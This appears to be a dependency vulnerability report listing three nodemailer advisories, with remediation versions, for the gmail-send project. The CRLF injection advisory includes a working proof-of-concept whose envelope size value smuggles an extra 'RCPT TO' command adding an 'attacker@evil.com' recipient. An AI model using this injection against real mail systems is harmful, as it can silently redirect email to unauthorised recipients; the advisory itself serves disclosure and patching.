Find, fix and prevent vulnerabilities in your code.
high severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send#1faf69492a31464def919b00844320d9a6927a23 › nodemailer@6.10.1Remediation: Upgrade to nodemailer@7.0.11.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to Uncontrolled Recursion in the addressparser function. An attacker can cause the process to terminate immediately by sending an email address header containing deeply nested groups, separated by many :s.
Remediation
Upgrade nodemailer to version 7.0.11 or higher.
References
medium severity
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send#1faf69492a31464def919b00844320d9a6927a23 › nodemailer@6.10.1Remediation: Upgrade to nodemailer@7.0.7.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to Interpretation Conflict due to improper handling of quoted local-parts containing @. An attacker can cause emails to be sent to unintended external recipients or bypass domain-based access controls by crafting specially formatted email addresses with quoted local-parts containing the @ character.
Remediation
Upgrade nodemailer to version 7.0.7 or higher.
References
low severity
new
- Vulnerable module: nodemailer
- Introduced through: nodemailer@6.10.1
Detailed paths
-
Introduced through: gmail-send@alykoshin/gmail-send#1faf69492a31464def919b00844320d9a6927a23 › nodemailer@6.10.1Remediation: Upgrade to nodemailer@8.0.4.
Overview
nodemailer is an Easy as cake e-mail sending from your Node.js applications
Affected versions of this package are vulnerable to CRLF Injection via the envelope.size parameter in the sendMail function. An attacker can inject arbitrary SMTP commands by supplying CRLF characters in the size property, which are concatenated directly into the SMTP command stream. This can result in unauthorized recipients being added to outgoing emails or other SMTP commands being executed.
Note:
This is only exploitable if the application explicitly passes a custom envelope object with a user-controlled size property to the mail sending process.
PoC
const net = require('net');
const nodemailer = require('nodemailer');
// Minimal SMTP server that logs raw commands
const server = net.createServer(socket => {
socket.write('220 localhost ESMTP\r\n');
let buffer = '';
socket.on('data', chunk => {
buffer += chunk.toString();
const lines = buffer.split('\r\n');
buffer = lines.pop();
for (const line of lines) {
if (!line) continue;
console.log('C:', line);
if (line.startsWith('EHLO')) {
socket.write('250-localhost\r\n250-SIZE 10485760\r\n250 OK\r\n');
} else if (line.startsWith('MAIL FROM')) {
socket.write('250 OK\r\n');
} else if (line.startsWith('RCPT TO')) {
socket.write('250 OK\r\n');
} else if (line === 'DATA') {
socket.write('354 Start\r\n');
} else if (line === '.') {
socket.write('250 OK\r\n');
} else if (line.startsWith('QUIT')) {
socket.write('221 Bye\r\n');
socket.end();
}
}
});
});
server.listen(0, '127.0.0.1', () => {
const port = server.address().port;
console.log('SMTP server on port', port);
console.log('Sending email with injected RCPT TO...\n');
const transporter = nodemailer.createTransport({
host: '127.0.0.1',
port,
secure: false,
tls: { rejectUnauthorized: false },
});
transporter.sendMail({
from: 'sender@example.com',
to: 'recipient@example.com',
subject: 'Normal email',
text: 'This is a normal email.',
envelope: {
from: 'sender@example.com',
to: ['recipient@example.com'],
size: '100\r\nRCPT TO:<attacker@evil.com>',
},
}, (err) => {
if (err) console.error('Error:', err.message);
console.log('\nExpected output above:');
console.log(' C: MAIL FROM:<sender@example.com> SIZE=100');
console.log(' C: RCPT TO:<attacker@evil.com> <-- INJECTED');
console.log(' C: RCPT TO:<recipient@example.com>');
server.close();
transporter.close();
});
});
Remediation
Upgrade nodemailer to version 8.0.4 or higher.